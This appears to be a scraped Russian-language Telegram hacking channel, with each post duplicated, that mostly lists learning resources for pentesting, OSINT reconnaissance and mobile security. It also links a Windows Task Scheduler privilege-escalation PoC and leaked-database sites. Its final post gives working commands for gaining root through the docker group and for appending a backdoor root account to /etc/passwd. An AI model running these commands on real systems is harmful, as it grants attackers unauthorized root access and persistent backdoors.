#begin #hacking
Начнем с основ, которые рекомендуются новичкам.
Новичков буду направлять на данный пост за ознакомлением с простейшими технологиями и инструментами, которые встречаются при анализе защищенности.
Linux/Bash:
Курс по основам Линукс - https://stepik.org/course/Введение-в-Linux-73
Web:
Простым языком об HTTP - https://habrahabr.ru/post/215117/
Burp Suite (Инструмент для анализа защищенности веб-приложений):
https://www.youtube.com/playlist?list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA
Networking:
Wireshark (Инструмент для анализа сетевого трафика) - https://habr.com/post/204274/
Exploits:
Основы Metasploit (Инструмент для поиска и разработки эксплойтов) - https://habrahabr.ru/post/234719/
Programming:
Ознакомление с Python, одним из популярнейших языков программирования среди сообщества хакеров - https://stepik.org/course/512
Статья будет пополняться и изменяться с появлением полезных идей.
Начнем с основ, которые рекомендуются новичкам.
Новичков буду направлять на данный пост за ознакомлением с простейшими технологиями и инструментами, которые встречаются при анализе защищенности.
Linux/Bash:
Курс по основам Линукс - https://stepik.org/course/Введение-в-Linux-73
Web:
Простым языком об HTTP - https://habrahabr.ru/post/215117/
Burp Suite (Инструмент для анализа защищенности веб-приложений):
https://www.youtube.com/playlist?list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA
Networking:
Wireshark (Инструмент для анализа сетевого трафика) - https://habr.com/post/204274/
Exploits:
Основы Metasploit (Инструмент для поиска и разработки эксплойтов) - https://habrahabr.ru/post/234719/
Programming:
Ознакомление с Python, одним из популярнейших языков программирования среди сообщества хакеров - https://stepik.org/course/512
Статья будет пополняться и изменяться с появлением полезных идей.
Stepik: online education
Введение в Linux
Курс знакомит слушателей с операционной системой Linux и основами её использования. В рамках курса мы покажем как установить Linux на ваш компьютер, расскажем о программах в нем, поработаем в терминале, зайдем на удаленный сервер и рассмотрим еще несколько…
🔥1
#basic #http
К основам веб-технологий добавляются основы технологий веб-безопасности:
https://habr.com/company/ruvds/blog/421347/
К основам веб-технологий добавляются основы технологий веб-безопасности:
https://habr.com/company/ruvds/blog/421347/
Habr
CORS, CSP, HTTPS, HSTS: о технологиях веб-безопасности
Автор материала, перевод которого мы публикуем сегодня, говорит, что существует множество причин изучать веб-безопасность. Например, вопросами безопасности интересуются пользователи веб-сайтов,...
#hacking #all
Всеобъемлющий репозиторий, содержащий разделы на все возможные темы связанные с хаккингом
https://github.com/rmusser01/Infosec_Reference
Всеобъемлющий репозиторий, содержащий разделы на все возможные темы связанные с хаккингом
https://github.com/rmusser01/Infosec_Reference
GitHub
GitHub - rmusser01/Infosec_Reference: An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference…
An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for non-MS Git hosted version. - rmusser01/Infosec_Reference
#hacking #osint #reconnaissance
Предлагаю для изучения небольшой мануал для проведения мероприятий по рекогносцировке в сети.
Разведка
Начальные условния:
* Имя компании;
* Доменное имя;
* IP адрес(а);
Цели:
1. Получить IP адреса принадлежщие компании
2. Получить доменные имена второго и третьего уровней принадлежащие компании
3. Собрать информацию об имеющихся публичных сервисах компании
4. Собрать информацию об используемых компанией технологиях
5. Собрать информацию о сотрудниках компании
Средства:
Шаги 1-2:
* host, nslookup, dig (Типы запросов: NS,ANY,TXT,AXFR,PTR...)
* whois (Получаем netblock и дополнительную информацию о принадлежности адреса какой-либо организации )
* Search engines:
- http://searchdns.netcraft.com/;
- https://www.shodan.io/host/;
- https://censys.io/
- https://community.riskiq.com/
- http://whois.webhosting.info/x.x.x.x
- http://google.com (inurl, site, filetype, cache, etc...)
* Recon-ng (All in the box)
* DNSrecon (DNS enumeration, revers lookup, scanning, whois recon)
* Amass (Very fast brute)
* subfinder (Brute and finding)
* Aquatone (Using pablic services like: shodan, censys, riskiq...)
Шаг 3:
* Shoodan.io (Информация о портах и сервисах)
* Nmap (Сканирование и поиск открытых портов)
* Eye-witness (Скриншоты интерфейсоф публичных сервисов)
* Web-Cache (Google Cache, Web Archive)
Шаг 4:
* Wappalyzer (Web анализ используемых технологий)
* BurpSuite (Проксируем трафик и используем VulnersDB плагин)
* Nmap (Ключ -sV - определение используемых версий ПО, -O - определение версий ОС)
* Наблюдение и опыт
Шаг 5:
* http://people.yandex.ru/ (Агрегированный посик людей в различных социальных сетях)
* http://vk.com, http://ok.ru, http://facebook.com (Социальные сети)
* TheHarvester, Z-Harvester (Поиск e-mail адресов в публичном доступе)
* Recon-ng (domains-contacts,companies-contacts, domains-creds)
* Leaked databases (http://databases.today/, http://snusbase.com/)
* FOCA (https://www.elevenpaths.com/labstools/foca/index.html) (Поиск документов различных форматов в веб-приложениях и публичных сервисах принадлжащих компании)
Дополнительно:
* http://osintframework.com/
Предлагаю для изучения небольшой мануал для проведения мероприятий по рекогносцировке в сети.
Разведка
Начальные условния:
* Имя компании;
* Доменное имя;
* IP адрес(а);
Цели:
1. Получить IP адреса принадлежщие компании
2. Получить доменные имена второго и третьего уровней принадлежащие компании
3. Собрать информацию об имеющихся публичных сервисах компании
4. Собрать информацию об используемых компанией технологиях
5. Собрать информацию о сотрудниках компании
Средства:
Шаги 1-2:
* host, nslookup, dig (Типы запросов: NS,ANY,TXT,AXFR,PTR...)
* whois (Получаем netblock и дополнительную информацию о принадлежности адреса какой-либо организации )
* Search engines:
- http://searchdns.netcraft.com/;
- https://www.shodan.io/host/;
- https://censys.io/
- https://community.riskiq.com/
- http://whois.webhosting.info/x.x.x.x
- http://google.com (inurl, site, filetype, cache, etc...)
* Recon-ng (All in the box)
* DNSrecon (DNS enumeration, revers lookup, scanning, whois recon)
* Amass (Very fast brute)
* subfinder (Brute and finding)
* Aquatone (Using pablic services like: shodan, censys, riskiq...)
Шаг 3:
* Shoodan.io (Информация о портах и сервисах)
* Nmap (Сканирование и поиск открытых портов)
* Eye-witness (Скриншоты интерфейсоф публичных сервисов)
* Web-Cache (Google Cache, Web Archive)
Шаг 4:
* Wappalyzer (Web анализ используемых технологий)
* BurpSuite (Проксируем трафик и используем VulnersDB плагин)
* Nmap (Ключ -sV - определение используемых версий ПО, -O - определение версий ОС)
* Наблюдение и опыт
Шаг 5:
* http://people.yandex.ru/ (Агрегированный посик людей в различных социальных сетях)
* http://vk.com, http://ok.ru, http://facebook.com (Социальные сети)
* TheHarvester, Z-Harvester (Поиск e-mail адресов в публичном доступе)
* Recon-ng (domains-contacts,companies-contacts, domains-creds)
* Leaked databases (http://databases.today/, http://snusbase.com/)
* FOCA (https://www.elevenpaths.com/labstools/foca/index.html) (Поиск документов различных форматов в веб-приложениях и публичных сервисах принадлжащих компании)
Дополнительно:
* http://osintframework.com/
Censys
Censys | The Authority for Internet Intelligence and Insights
Censys empowers security teams with the most comprehensive, accurate, and up-to-date map of the internet to defend attack surfaces and hunt for threats.
❤2
#hacking #mobileApp
Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
sushi2k.gitbooks.io
Platform Overview · OWASP Mobile Security Testing Guide
#hacking #privilageEscalation
Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
#hacking #macos
Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest
Easy way:
Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest
Easy way:
brew install sidaf/pentest/recon-ng
GitHub
GitHub - sidaf/homebrew-pentest: Homebrew Tap - Pen Test Tools
Homebrew Tap - Pen Test Tools. Contribute to sidaf/homebrew-pentest development by creating an account on GitHub.
#professional #hacking #windows #exploit
Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.
Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.
Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/
На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/
Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.
Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).
Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.
Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.
Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.
Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/
На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/
Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.
Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).
Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.
Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
Хабр
Опубликован эксплоит для незакрытой уязвимости в планировщике задач Windows (перевод)
Одним из исследователей безопасности была опубликована в Twitter информация об уязвимости в ОС Windows. Уязвимость заключается в эскалации привилегий на локал...
#hacking #mobileApp #professional
Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
GitHub
MobileApp-Pentest-Cheatsheet/README.md at master · tanprathan/MobileApp-Pentest-Cheatsheet
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - tanprathan/MobileApp-Pentest-Chea...
#hacking #knowledge #tg
По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.
P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.
Каналы:
https://t.me/antichat - легендарный форум Antichat перешел в Tg.
https://t.me/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://t.me/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://t.me/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://t.me/xakep_ru - официальный канал журнала Хакер
https://t.me/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://t.me/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://t.me/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://t.me/infosecmemes - самое важное в нашем деле - это мемы
https://t.me/cyberpunkyc - один известный хаккер со своим мнением
https://t.me/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://t.me/webpwn - канал известного хакера из сферы Application Security
https://t.me/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://t.me/cybershit - канал с актуальщиной в мире ИБ
https://t.me/github_repos - интересные репозитории со всего мира
Чаты:
https://t.me/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://t.me/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://t.me/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://t.me/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям
Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.
P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.
Каналы:
https://t.me/antichat - легендарный форум Antichat перешел в Tg.
https://t.me/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://t.me/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://t.me/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://t.me/xakep_ru - официальный канал журнала Хакер
https://t.me/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://t.me/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://t.me/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://t.me/infosecmemes - самое важное в нашем деле - это мемы
https://t.me/cyberpunkyc - один известный хаккер со своим мнением
https://t.me/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://t.me/webpwn - канал известного хакера из сферы Application Security
https://t.me/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://t.me/cybershit - канал с актуальщиной в мире ИБ
https://t.me/github_repos - интересные репозитории со всего мира
Чаты:
https://t.me/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://t.me/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://t.me/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://t.me/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям
Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
Telegram
ANTICHAT Channel
Официальный канал https://forum.antichat.club
#professional #hacking #LPE
Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)
Если на скомпрометированной машине команда
Следующий шаг, добавить бэкдор командой (Учетные данные: toor/password):
https://twitter.com/4lex/status/1035932897407115264
Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)
Если на скомпрометированной машине команда
id показывает, что текущий пользователь принадлежит группе docker, значит существует возможность получить доступ к ОС от имени пользователя root командой:$ docker run -it --rm -v /:/mnt bashСледующий шаг, добавить бэкдор командой (Учетные данные: toor/password):
# echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
Ссылка на оригинал:https://twitter.com/4lex/status/1035932897407115264
Twitter
[audible]blink
You land on a computer and `id` shows you're part of the `docker` group. Escalate to root with: $> docker run -it --rm -v $PWD:/mnt bash adds backdoor toor:password #> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
